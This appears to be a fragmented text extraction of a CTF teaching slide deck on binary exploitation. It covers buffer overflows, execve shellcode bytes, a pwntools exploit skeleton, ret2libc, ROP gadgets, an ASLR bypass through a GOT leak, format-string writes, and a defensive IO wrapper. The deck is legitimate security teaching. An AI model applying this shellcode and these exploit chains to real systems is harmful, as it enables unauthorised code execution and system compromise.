Upload
weber-tsai
View
2.000
Download
10
Embed Size (px)
Citation preview
PWN Basic II
….
PWN )
QAQ
<(_ _)>
• Ubuntu VM
• practices.tar.gz
PWN
PWN CTFCTF
• IP port
•
Overflow
btw…btw..
Overflow
Overflow
....... ?
Outline• Buffer Overflow
• ROP ( Return Oriented Programing )
• ret2libc
• ret2text
• gadgets
• format string vulnerability
• CTF ( Attack & Defense )
Buffer Overflow
x86 Stack Layout
buffer >>
EBPReturn Address
Arg 1Arg 2
…
EBPEBP + 0x04EBP + 0x08EBP + 0x0C
EBP - 0x04EBP - 0x08
Buffer Overflowvoid Function( arg1, arg2 ) {
char buffer[16];……scanf(“%s”, &buffer);……
}
push ebpmov ebp, espsub ebp, 0x10……
———>
———>
buffer
EBPReturn Address
arg1arg2…
EBPEBP + 0x04EBP + 0x08EBP + 0x0C
EBP - 0x04EBP - 0x08
———>
EBP - 0x0CEBP - 0x10
Buffer Overflowvoid Function( arg1, arg2 ) {
char buffer[16];……scanf(“%s”, &buffer);……
}
———>
AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA AAAAAA
Buffer Overflow
Buffer Overflow
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…
EBPEBP + 0x04EBP + 0x08EBP + 0x0C
EBP - 0x04EBP - 0x08EBP - 0x0CEBP - 0x10
Buffer Overflow
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…
EBPEBP + 0x04EBP + 0x08EBP + 0x0C
EBP - 0x04EBP - 0x08EBP - 0x0CEBP - 0x10
buffer
EBPReturn Address
arg1arg2…
EBPEBP + 0x04EBP + 0x08EBP + 0x0C
EBP - 0x04EBP - 0x08EBP - 0x0CEBP - 0x10
Before After
Buffer OverflowBuffer Overflow……leaveret
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…
ESP >>
Buffer Overflowret = pop eip
jmp AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…
ESP >>
Control EIP ?
Buffer Overflow
Practice #1
Practice #1
Step #2•
Step #3from pwn import *
r = process('./pratice1')eip = payload = 'a' * + p32(eip)
r.sendline(payload)r.interactive()
system(“/bin/sh”)
AAAAAAAAAAAAAAAAAAAA
0x8000f04 or -> jmp esp
shellcode
…
0x8000f000x8000f040x8000f08
0x8000ffc0x8000ff80x8000ff40x8000ff00x8000fec
Buffer Overflow
Practice #2
Step #1
Find Return Address
Step #2• Stack
• gdb ? gdb stack
• coredump $ ulimit -c unlimited$ sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern’
• jmp esp
Step #2
Step #2jmp esp ?
Step #3ShellCode
ShellCodenasm DIY
scanf 0x0b 0x0a 0x00 … etc
shellcode
Step #3Step #3 08048062 <starter>: 8048062: 31 c0 xor eax,eax 8048064: 40 inc eax 8048065: 40 inc eax 8048066: 40 inc eax 8048067: 40 inc eax 8048068: 40 inc eax 8048069: 40 inc eax 804806a: 40 inc eax 804806b: 40 inc eax 804806c: 40 inc eax 804806d: 40 inc eax 804806e: 40 inc eax 804806f: 31 c9 xor ecx,ecx 8048071: 51 push ecx 8048072: 68 2f 2f 73 68 push 0x68732f2f 8048077: 68 2f 62 69 6e push 0x6e69622f 804807c: 89 e3 mov ebx,esp 804807e: 31 d2 xor edx,edx 8048080: cd 80 int 0x80
ebx = “bin/sh\x00”
ecx= 0
eax= 11
edx = 0execve
Step #3shellcode =
“\x31\xc0\x40\x40”“\x40\x40\x40\x40”“\x40\x40\x40\x40”“\x40\x31\xc9\x51”“\x68\x2f\x2f\x73”“\x68\x68\x2f\x62”“\x6e\x89\xe3\x31”“\xd2\xcd\x80”
Step #4• payload =
‘a’ * ?? + stack_address + shellcode
• Write Exploit ~~~
DEPData Execution Prevention
aaaaaaaaaaaaaaaa
aaaa0xffffcff4
Shell Code
…
0xffffcff00xffffcff40xffffcff8
0xffffcfe80xffffcfec
0xffffcfe40xffffcfe00xffffcfdc
ShellCode Stack ...
Stack RRRRRRRRRRR
ROPReturn Oriented Programing
ROP
ret ret
ROPret ret ret ret ret ret ret
…
ROP
ROP
ROPret2libc
DEP return stack
return
libc.so
system(“/bin/sh”);
system(“bin/sh”);
ROP - ret2libc
ROP - ret2libcaaaaaaaaaaaaaaaa
aaaasystem
fake ret address
“/bin/sh”
0xffffcff00xffffcff40xffffcff8
0xffffcfe80xffffcfec
0xffffcfe40xffffcfe00xffffcfdc
0xffffcffc
<— return system
<- return
<- system “/bin/sh”
Practice #3
Step #1
Find Return Address
Step #2• system ?
• “/bin/sh” ?
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Step #3• Write Payload
aaaaaaaaaaaaaaaa
aaaasystem addr
fake ret address
“/bin/sh”
ROPret2text
return code / plt
PIE text
static link Code
ROP gadgets
ROP - gadgetspop edxret
xor eax,eaxret
push espret
mov eax,ebxret
ROP - gadgetsR/W Register:pop eaxret
R/W Memory:pop edxpop eaxmov [eax],edxret
Logical Operation:xor eax,eaxand eax,ecx
ROP chainpop edxret
pop eaxret
0x080481c9
controll edx
0x08043a24
controll eax
...
...
0x080481c9
0x08043a24
...ret
ROP - gadgets
gadgets?
ROP - gadgets
ROP - gadgets
ROPgadget.py
https://github.com/JonathanSalwan/ROPgadget
ROPgadget.py• ret gadgets
• ROP chain
Practice #4
• ROPgadget
• objdump -d filename
• | less less
ASLRAddress Space Layout Randomization
ASLR
Stack
Heap
Shared Libary…….
libc
ASLR• cat /proc/<pid>/maps section
• ASLR shared lib stack heap
....
system “/bin/sh”
aaaaaaaaaaaaaaaa
aaaasystem
fake ret address
“/bin/sh”
0xffffcff00xffffcff40xffffcff8
0xffffcfe80xffffcfec
0xffffcfe40xffffcfe00xffffcfdc
0xffffcffc
ASLR
ASLR libc gadgets….
...libc
ASLR
?
system
• Libc
• Libc
• got.plt
• system…
• oveflow binary puts write fwrite …… got stdout
• got
• system ‘bin/sh’
• overflow system(“/bin/sh”)
aaaaaaaaaa….
plt_write
vulner_function
0
got_write
4
aaaaaaaaaa….
system
0
&“bin/sh”
Practice #5
• pwntools ELF binary
• pwntools ELF.symbol[func_name] plt
• pwntools ELF.got[function_name] got
• puts leak got
• system ”bin/sh”
format string Vulnerability
... ... XD
scanf printf
printf
scanf
...printf format String
%n..?
%n•
• Ex.
• printf(“12345%n”, &a):
• 5 a
• format String %n
• %hn %hhn
• %n 4 byte (int)
• %hn 2 byte (short)
• %hhn 1 byte (byte)
....
3
payload der(X
IOWrapper
IO Wrapper•
•
• flag
•
• der
IO Wrapper• printf puts …… etc
• scanf gets ...... etc /
IO WrapperIO Wrapper Process 1
Process 2
Process …
execvp
socket server
IO Wrapper• ?
• fork()
• pid_t pid = fork();if ( pid == 0 ) { /* sub process */ execvpe(…);} else { /* parent */}
IO Wrapper• stdin/stdout ?
• pipe
• pipe : pipe() dup2()
IO Wrapper• while ( true ) { fread(stdin, ….. ); /* may blocked */ fwrite(stdin_of_sub_process,…..); fread(stdin, ….. ); /* may blocked */ fwrite(stdout, …..); }
IO Blocked
select
IO Wrapper
• select() and pselect() allow a program to monitor multiple file descriptors, waiting until one or more of the file descriptors become "ready" for some class of I/O operation (e.g., input possible). A file descriptor is considered ready if it is possible to perform a corresponding I/O operation (e.g., read(2) without blocking, or a sufficiently small write(2)).
http://man7.org/linux/man-pages/man2/select.2.html
• file descriptor (fd) fd
• blocked
select
fd
select http://goo.gl/RKIOeO
LD_PRELOAD
LD_PRELOAD• LD_PRLOAD
• library
•
LD_PRELOAD• mylib.c
#include <stddef.h>#include <stdio.h>
int puts(const char * str) {/* */
}
LD_PRELOAD• main.c
#include <stdlib.h>#include <stdio.h>
void main(int argc,char * argv[]) { puts(“Hello World”);}
LD_PRELOAD• $ gcc -Wall -fpic -shared -o mylib.so mylib.c
• $ gcc -o main main.c
• $ LD_PRELOAD=./mylib.so
• $ ./main
<(_ _)>
Reference• http://drops.wooyun.org/tips/6597
• AIS3 Binary Exploit
• http://pwntools.readthedocs.org/en/latest/dynelf.html
• http://www.slideshare.net/hackstuff/rop-40525248